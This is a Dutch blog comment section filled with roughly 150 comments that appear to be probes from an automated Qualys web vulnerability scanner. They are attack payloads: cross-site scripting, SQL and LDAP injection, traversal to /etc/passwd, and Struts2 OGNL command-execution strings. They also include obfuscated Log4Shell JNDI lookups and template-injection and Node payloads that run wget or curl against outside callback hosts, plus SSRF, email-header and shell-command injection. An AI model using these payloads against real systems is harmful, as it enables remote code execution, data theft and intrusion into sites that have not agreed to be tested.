169 Responses

  1. 1
    | Beantwoorden

    1

  2. Veiligheidsscan ForusP
    | Beantwoorden

    1

  3. 1
    | Beantwoorden

    “‘>

  4. 1
    | Beantwoorden

    ” onEvent=X139823199612288Y2_2Z

  5. 1
    | Beantwoorden

    1″‘>

  6. 1
    | Beantwoorden

    “‘>

  7. 1
    | Beantwoorden

    “‘>

  8. 1
    | Beantwoorden

    %3cscript z%3e_q(y)%3c/script%3e

  9. 1
    | Beantwoorden

    {{333*334}}

  10. 1
    | Beantwoorden

    q
    Qualys_resp_hdr_injection: Vulnerable

  11. qualyswasesi
    | Beantwoorden

    1

  12. 1
    | Beantwoorden

    ;–

  13. 1
    | Beantwoorden

    /*

  14. 1
    | Beantwoorden

    ,

  15. 1
    | Beantwoorden

    1e309

  16. 1
    | Beantwoorden

    //….//….//….//….//….//….//….//etc/passwd

  17. 1
    | Beantwoorden

    ….//….//….//….//….//….//etc/passwd

  18. 1
    | Beantwoorden

    %25{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  19. 1
    | Beantwoorden

    a(){}phpinfo(); function a

  20. http://rfitest/
    | Beantwoorden

    1

  21. 1
    | Beantwoorden

    “);(function(){qxssI6k0AOh7});/**/”

  22. 1
    | Beantwoorden

    ‘;(function(){qxss3pJB6irM});/**/’

  23. 1
    | Beantwoorden

    9
    ;(function(){qxssBMv4NiL6});//

  24. 1
    | Beantwoorden

    ‘-qxssfAAMnTQ4()-‘

  25. 1
    | Beantwoorden

    “-qxssS1YcI7Fl()-“

  26. 1
    | Beantwoorden

    1!@#$%^&*()

  27. 1
    | Beantwoorden

    !@#$%^&*()

  28. 1
    | Beantwoorden

    {23.0231*213.759}${23.0231*213.759}{{=23.0231*213.759}}

  29. 1
    | Beantwoorden

    (23.0231*213.759)

  30. 1
    | Beantwoorden

    1)(attribute2=*)

  31. 1)(attribute2=*)
    | Beantwoorden

    1

  32. 1
    | Beantwoorden

    1*(|(objectclass=*))

  33. 1
    | Beantwoorden

    1*

  34. 1
    | Beantwoorden

    1)(|(uid=*)

  35. 1
    | Beantwoorden

    1)(|(gidNumber=*)

  36. 1
    | Beantwoorden

    Joe+
    bcc:was_engine@4365a61de0cab6a8458f49a3b46d2be64f0923c2.2168011610231792.1047765570.smtphi01.smtp.eu1.qualysperiscope.com.

  37. 1
    | Beantwoorden

    c1b5e90293c3bb22bfd94ba5e9c77c75f92512aa.2168011610231792.1314142982.ssrf02.ssrf.eu1.qualysperiscope.com.

  38. 1
    | Beantwoorden

    ${jndi:rmi://ee08445af41ecf961af9844877c61a053b30a6d6.2168011610231792.216621298.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}

  39. 1
    | Beantwoorden

    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://d3196c2e5ba0eaffdabf71841e0df1df3f5bdb7d.2168011610231792.2310138708.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

  40. 1
    | Beantwoorden

    ${jnd${123%ff:-${123%ff:-i:}}ldap://a77a921a193d9e958c96bcbd10e6511383dcb280.2168011610231792.1100770962.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}

  41. 1
    | Beantwoorden

    ${jndi:dns://d066e10998fa1b820b3bad84be333ea945f05e1c.2168011610231792.250503936.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

  42. 1
    | Beantwoorden

    ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://da0e7b41477c629ea59a0bbd62f7cb410df2278c.2168011610231792.3377359016.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}

  43. 1
    | Beantwoorden

    {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://f90daafcb768d1b3744ce639cebee8d53c40167e.2168011610231792.1409414041.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}

  44. 1
    | Beantwoorden

    @pd.core.frame.com.builtins.__import__(“os”).system(“””curl 23ef0b7a3d7b52af8d9d09d3ac851d9bf22aa09e.2168011610231792.3485763648.oscomm15256400.oscomm.eu1.qualysperiscope.com.#”””)

  45. 1
    | Beantwoorden

    $..[?(p=”console.log(this.process.mainModule.require(‘child_process’).execSync(‘curl 75de3f6bb35aef4ed13975fbddbc872d85a1996e.2168011610231792.417843277.oscomm15279701.oscomm.eu1.qualysperiscope.com.’).toString())”;QualysWAS=”[[‘constructor’]][[‘constructor’]](p);QualysWAS())]

  46. 1

  47. 1
    | Beantwoorden

    file:///etc/passwd

  48. 1

  49. 1
    | Beantwoorden

    1′) or 2634=2634 —

  50. 1
    | Beantwoorden

    1′ or 3789=3789 —

  51. 1
    | Beantwoorden

    1 or 4325=4325 —

  52. 1
    | Beantwoorden

    “‘>

  53. 1
    | Beantwoorden

    _q=random(X140285921260992Y2_2Z)

  54. 1
    | Beantwoorden

    ‘ onEvent=X140285921260992Y2_2Z

  55. 1
    | Beantwoorden

    ” onEvent=X140285921260992Y2_2Z

  56. 1
    | Beantwoorden

    javascript:qxss(X140285921260992Y2_2Z);

  57. 1
    | Beantwoorden

    “>

  58. 1
    | Beantwoorden

    1″‘>

  59. 1
    | Beantwoorden

    z–>

  60. 1
    | Beantwoorden

    “‘>

  61. 1
    | Beantwoorden

    _q=random(X140285921260992Y2_2Z)

  62. 1
    | Beantwoorden

    _q=random(X140285921260992Y2_2Z)

  63. 1
    | Beantwoorden

    1 _q_q=random(08o75ybQ)

  64. 1
    | Beantwoorden
  65. 1
    | Beantwoorden

    ” SRC=//localhost/j854gd5w4>

  66. 1
    | Beantwoorden
  67. 1
    | Beantwoorden

    “‘><qssUIFogWDb=7;//<

  68. 1
    | Beantwoorden
  69. 1
    | Beantwoorden
  70. 1
    | Beantwoorden

    1″>

  71. 1
    | Beantwoorden

    BODY{background:url(“javascript:qssefKN8lKq=7”)}

  72. 1
    | Beantwoorden
  73. 1
    | Beantwoorden

    “‘>

  74. 1
    | Beantwoorden

    qssnyOHM6cz=7

  75. 1
    | Beantwoorden

    <script src=http://localhost/j

  76. 1
    | Beantwoorden

    qss{{q=(2*2.0)}}qss

  77. {{333*334}}
    | Beantwoorden

    1

  78. 1
    | Beantwoorden

    q
    Content-Type:text/html
    Content-Length: 190

    HTTP/1.1 200 OK
    Content-Type: text/html
    Set-Cookie: a=q
    Content-Length: 2

    AA

  79. 1
    | Beantwoorden

    q
    Qualys_resp_hdr_injection: Vulnerable

  80. 1
    | Beantwoorden

    qualyswasesi

  81. 1
    | Beantwoorden

    1′

  82. ;--
    | Beantwoorden

    1

  83. 1
    | Beantwoorden

    #

  84. /*
    | Beantwoorden

    1

  85. 1
    | Beantwoorden

  86. ,
    | Beantwoorden

    1

  87. 1
    | Beantwoorden

    (

  88. 1e309
    | Beantwoorden

    1

  89. 1
    | Beantwoorden

    php://filter/read=string.rot13/resource=/etc/passwd

  90. 1
    | Beantwoorden

    %{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q9d4hi5j’).(#str3=’R9D7e8′).(#str=#str2+’:QQ:’+#str1+’:TT:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  91. 1
    | Beantwoorden

    %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#str1=’A2B8C3′).(#str2=’q2d1hi3j’).(#str3=’B4D7e6′).(#str=#str2+’:QQ:’+#str1+’:PP:’+#str3).(#cmd=’echo ‘+ #str).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}

  92. 1
    | Beantwoorden

    |netstat -an

  93. 1
    | Beantwoorden

    http://rfitest/

  94. 1
    | Beantwoorden

    “;(function(){qxss35wUWWS1});/**/”

  95. 1
    | Beantwoorden

    “);(function(){qxssdWxvpQmQ});/**/”

  96. 1
    | Beantwoorden

    qualys(aqxssAT7dfR2n)xyz

  97. 1
    | Beantwoorden

    ‘;(function(){qxss0m5pZ5vE});/**/’

  98. 1
    | Beantwoorden

    9;(function(){qxssjBDVzqd4});//

  99. 1
    | Beantwoorden

    9
    ;(function(){qxssQwH150nH});//

  100. 1
    | Beantwoorden

    */;(function(){qxss0U5W3Yul});/*

  101. 1
    | Beantwoorden

    ‘-qxss4aT13F4y()-‘

  102. 1
    | Beantwoorden

    “-qxssqpAAf131()-“

  103. 1
    | Beantwoorden

    1!@#$%^&*()

  104. 1
    | Beantwoorden

    !@#$%^&*()1

  105. 1
    | Beantwoorden

    !@#$%^&*()

  106. 1
    | Beantwoorden

    |aaaa
    =(23.0231*213.759)
    |${23.0231*213.759}{23.0231*213.759}{{23.0231*213.759}}(23.0231*213.7591)=(23.0231*213.759)#{23.0231*213.759}

  107. 1
    | Beantwoorden

    ;echo 23.0231*213.759;//{@math key=4335.158242899999 method=”add” operand=586.23659/}
    /*

    #set($value=23.0231*213.759)
    $value
    */

  108. 1

  109. 1
    | Beantwoorden

    <!–#config timefmt="” –>qualyswas:

  110. 1
    | Beantwoorden

    function(){qxss3DNp2K9p};

  111. 1
    | Beantwoorden

    ${”.getClass().forName(‘java.lang.Runtime’).getMethods()[6].toString()}

  112. 1
    | Beantwoorden

    QualysWAS${150797*150797}QualysWAS

  113. 1
    | Beantwoorden

    1)(uid=*))(|(uid=*

  114. 1
    | Beantwoorden

    1)(|(cn=*))

  115. 1*
    | Beantwoorden

    1

  116. 1
    | Beantwoorden

    1)(|(objectclass=*)

  117. 1)(|(uid=*)
    | Beantwoorden

    1

  118. 1
    | Beantwoorden

    1)(|(homeDirectory=*)

  119. 1

  120. 1
    | Beantwoorden

    1)(|(uidNumber=*)

  121. 1
    | Beantwoorden

    Joe+
    bcc:was_engine@30224968195dc50dee67605ec2c70649f3653411.2183101010231792.2906004734.smtphi01.smtp.eu1.qualysperiscope.com.

  122. 1
    | Beantwoorden

    12aa66c9db81199807f25cf97c28351649c11012.2183101010231792.649056049.ssrf02.ssrf.eu1.qualysperiscope.com.

  123. 1
    | Beantwoorden

    ${jndi:ldap://fcce299db1a21772bf5675de12484a01d946d4cc.2183101010231792.3441164599.log4j02.log4j.eu1.qualysperiscope.com./QualysWAS}

  124. 1
    | Beantwoorden

    ${jndi:rmi://99b274a2abd2f8a83d75c9314de89eee256dd177.2183101010231792.4252479270.log4j03.log4j.eu1.qualysperiscope.com./QualysWAS}

  125. 1
    | Beantwoorden

    ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://d2d68705fa42995abf096e83240d478de0d389a1.2183101010231792.1791685453.log4j04.log4j.eu1.qualysperiscope.com./QualysWAS}

  126. 1
    | Beantwoorden

    ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://a61c45324429088b255779e2e82a0b0c197bed01.2183101010231792.961902348.log4j05.log4j.eu1.qualysperiscope.com./QualysWAS}

  127. 1
    | Beantwoorden

    ${j${::-n}di:ldap${::-:}//114d42bf20ab7733507d5a8be4c5054d8a8d0955.2183101010231792.3990021575.log4j06.log4j.eu1.qualysperiscope.com./QualysWAS}

  128. 1
    | Beantwoorden

    ${jnd${123%ff:-${123%ff:-i:}}ldap://61e761152ac1f8f26fddda33132ffddb244e59b7.2183101010231792.2253493329.log4j07.log4j.eu1.qualysperiscope.com./QualysWAS}

  129. 1
    | Beantwoorden

    ${${k8s:k5:-J}${k8s:k5:-ND}i${sd:k5:-:}l${lower:D}ap${sd:k5:-:}//6f785ea54436de649b7a843cdcaf9cf8e8148c3a.2183101010231792.1098729147.log4j08.log4j.eu1.qualysperiscope.com./QualysWAS}

  130. 1
    | Beantwoorden

    ${jndi:dns://41a2c6ebcfd7cce00c1e0fc899b932e134184029.2183101010231792.750573740.log4j09.log4j.eu1.qualysperiscope.com./QualysWAS}

  131. 1
    | Beantwoorden

    ${j${k8s:k5:-ND}i${sd:k5:-:}${lower:L}dap${sd:k5:-:}//6d21020300cdf70474a440d966d533061d6f280e.2183101010231792.3749227859.log4j10.log4j.eu1.qualysperiscope.com./QualysWAS}

  132. 1
    | Beantwoorden

    ${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://58245bf4c8691d0ac59ebf33e95ab25bf5d22926.2183101010231792.3239394689.log4j11.log4j.eu1.qualysperiscope.com./QualysWAS}

  133. 1
    | Beantwoorden

    ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}://0ff6fd902904f12c65ac723a5e094ac4b79fa712.2183101010231792.3500733073.log4j12.log4j.eu1.qualysperiscope.com./QualysWAS}

  134. 1
    | Beantwoorden

    {{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen(‘wget http://c5e7aff9c9f6fc736b2ac2561de8b4cc48a79731.2183101010231792.3927387682.oscomm15019101.oscomm.eu1.qualysperiscope.com.’).read() }}

  135. 1
    | Beantwoorden

    ${“”.getClass().forName(“java.net.InetAddress”).getMethod(“getByName”,””.getClass()).invoke(“”,”6f75978ecfd6bfd78e1cba5fce3f887f3a3b57fd.2183101010231792.1503413798.oscomm15079701.oscomm.eu1.qualysperiscope.com.”)}

  136. 1
    | Beantwoorden

    @pd.core.frame.com.builtins.__import__(“os”).system(“””curl 1c670bbcb9b9a1a8f3dac2369b4af777d2230d30.2183101010231792.3433830106.oscomm15256400.oscomm.eu1.qualysperiscope.com.#”””)

  137. 1
    | Beantwoorden

    @pd.core.frame.com.builtins.__import__(“os”).system(“””curl 206672234de71db328cd8776b5ff5b64cd2b99a2.2183101010231792.11969705.oscomm15256401.oscomm.eu1.qualysperiscope.com.#”””)

  138. 1
    | Beantwoorden

    $..[?(p=”console.log(this.process.mainModule.require(‘child_process’).execSync(‘curl 00aaba32cec4dc985d4004d05856ac3ed4016cc4.2183101010231792.3318852717.oscomm15279701.oscomm.eu1.qualysperiscope.com.’).toString())”;QualysWAS=”[[‘constructor’]][[‘constructor’]](p);QualysWAS())]

  139. 1
    | Beantwoorden

    1′) and 2634=1123 —

  140. 1
    | Beantwoorden

    1′ and 3789=1391 —

  141. 1
    | Beantwoorden

    1 and 4325=2728 —

  142. 1
    | Beantwoorden

    1 or 6248 IS NULL

  143. 1
    | Beantwoorden

    1 and 7248 IS NULL

  144. 1
    | Beantwoorden

    1′) and ‘swqtp’=’ptqws

  145. 1
    | Beantwoorden

    1′ and ’tpklq’=’xqlkp

  146. 1
    | Beantwoorden

    11 or 11=12

  147. 1
    | Beantwoorden

    1′ and false() and ‘or’ = ‘and

  148. 1
    | Beantwoorden

    1 and false() and ‘or’ = ‘and’

  149. 1
    | Beantwoorden

    1″ and false() and “or” = “and

  150. 1
    | Beantwoorden

    aaaa&ping -n 92 localhost&

Geef een reactie

Je e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *